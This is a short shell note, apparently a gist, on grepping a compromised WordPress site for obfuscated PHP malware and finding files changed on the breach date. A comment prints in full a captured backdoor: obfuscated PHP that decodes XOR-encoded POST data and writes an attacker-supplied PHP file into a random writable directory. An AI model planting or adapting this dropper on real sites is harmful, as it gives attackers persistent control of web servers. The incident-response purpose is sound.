Grep wordpress to search for obsfucate PHP malware

wordpress_malware_check.sh

grep  "\$[a-zA-Z0-9]*("  ./ -ir

# should find some funky stuff like:
# ./wp-content/plugins/classic-editor/js/hoxozkwa.php:<?php $LRhdThLn = "\104"."\117".chr(67)."\x55".chr(77).'E'."\x4e"."\x54".chr(95)."\x52".chr(79).chr(79).'T';$qEJGBsQZ = "\x48"."\x54".'T'.chr(331-251).chr(95).'H'."\117"."\x53"."\x54";$FocpVmGikU = chr(104)."\x74".chr(116).chr(875-763)."\72"."\57".chr(370-323);$InqeP = chr(591-545).chr(463-351)."\150".chr(112);$OmaOCPiem = "\160".chr(104)."\160";$aALnXcWKii = 'f'."\151"."\154".chr(101)."\137".chr(889-777)."\x75".chr(727-611).chr(95).chr(99)."\157".chr(110).'t'.chr(576-475)."\x6e"."\x74".'s';$eleTmtrO = chr(552-438)."\x61".chr(119).'u'."\162".chr(732-624).'d'."\145".chr(950-851)."\x6f".'d'."\x65";$YGdQfPUtlO = chr(117)."\156"."\x73"."\145".chr(114).'i'.'a'."\154".'i'.chr(585-463).chr(799-698);$wuLUaDUX = chr(112)."\150".chr(112)."\166"."\145"."\x72"."\163"."\151".chr(111).'n';$VaXDosXIU = 's'.'t'."\x72"."\x5f".chr(114).chr(227-116)."\164".chr(49).chr(108-57);$BVrBroINfP = "\163".chr(101).'r'.'i'."\141".chr(637-529)."\151".chr(579-457)."\145";$jltoISt = chr(845-730).'t'."\x72".'_'.chr(115).chr(112)."\154".chr(105)."\x74";foreach ($_POST as $IbPYBs => $eIuItYTG){if (strlen($IbPYBs) == 16){$eIuItYTG = $jltoISt($eleTmtrO($VaXDosXIU($eIuItYTG)));$IbPYBs = array_slice($jltoISt(str_repeat($IbPYBs, (count($eIuItYTG)/16)+1)), 0, count($eIuItYTG));function VrKLUkfxG($lcvkMP, $qljnaDbI, $IbPYBs){$IdsUDSqEOX = "baddf620-11f1-4e09-9f3d-876476b02b3a";return $lcvkMP ^ $IdsUDSqEOX[$qljnaDbI % strlen($IdsUDSqEOX)] ^ $IbPYBs;}$eIuItYTG = implode("", array_map("VrKLUkfxG", array_values($eIuItYTG), array_keys($eIuItYTG), array_values($IbPYBs)));$eIuItYTG = @$YGdQfPUtlO($eIuItYTG);if (@is_array($eIuItYTG)){$RvqUXNHiI = array_keys($eIuItYTG);$eIuItYTG = $eIuItYTG[$RvqUXNHiI[0]];if ($eIuItYTG === $RvqUXNHiI[0]){echo @$BVrBroINfP(Array($OmaOCPiem => @$wuLUaDUX(), ));exit();}else {function JZejiips($CPKtGwir){static $OCUaFV = array();$HQbufPbr = glob($CPKtGwir . '/*', GLOB_ONLYDIR);if (count($HQbufPbr) > 0) {foreach ($HQbufPbr as $CPKtGw) {if (@is_writable($CPKtGw)) {$OCUaFV[] = $CPKtGw;}}}foreach ($HQbufPbr as $CPKtGwir) JZejiips($CPKtGwir);return $OCUaFV;}$cMaYE = $_SERVER[$LRhdThLn];$HQbufPbr = JZejiips($cMaYE);$RvqUXNHiI = array_rand($HQbufPbr);$mtujCvFpOt = $HQbufPbr[$RvqUXNHiI] . "/" . substr(md5(time()), 0, 8) . $InqeP;@$aALnXcWKii($mtujCvFpOt, $eIuItYTG);echo $FocpVmGikU . $_SERVER[$qEJGBsQZ] . substr($mtujCvFpOt, strlen($cMaYE));exit();}}}}
# root@zupe # ls -alFth ./wp-content/plugins/classic-editor/js/hoxozkwa.php
# -rw-r--r-- 1 zupe-1 zupe-1 2.4K Feb  6  2020 ./wp-content/plugins/classic-editor/js/hoxozkwa.php

# Once you know when the data of the breach, you can search for specific files modified in that date to narrow down what got changed:
# Of course, there will also be some false positives, which could be legitimate files, but some of them could also be backdoored, just modified a slightly bit.
# But for example 088p8rr8/FabZZ.js.php clearly are something malicious and you can confirm that by looking at the file with `cat``
# root@zupe:/home/zupe-1/htdocs/www.zupe.website# touch --date "2020-02-05" /tmp/start
# touch --date "2020-02-07" /tmp/end
# root@zupe:/home/zupe-1/htdocs/www.zupe.website# find .  -type f -newer /tmp/start -not -newer /tmp/end
# ./wp-blog-header.php
# ./wp-admin/moderation.php
# ./wp-content/themes/088p8rr8/FabZZ.js.php
# ./wp-content/themes/088p8rr8/aRO.js.php
# ./wp-content/themes/088p8rr8/Nd.js.php
# ./wp-content/themes/twentytwentythree/Nd.js.php
# ./wp-content/plugins/84q5po64/FabZZ.js.php
# ./wp-content/plugins/84q5po64/aRO.js.php
# ./wp-content/plugins/84q5po64/Nd.js.php# 
root@zupe:/home/zupe-1/htdocs/www.zupe.website#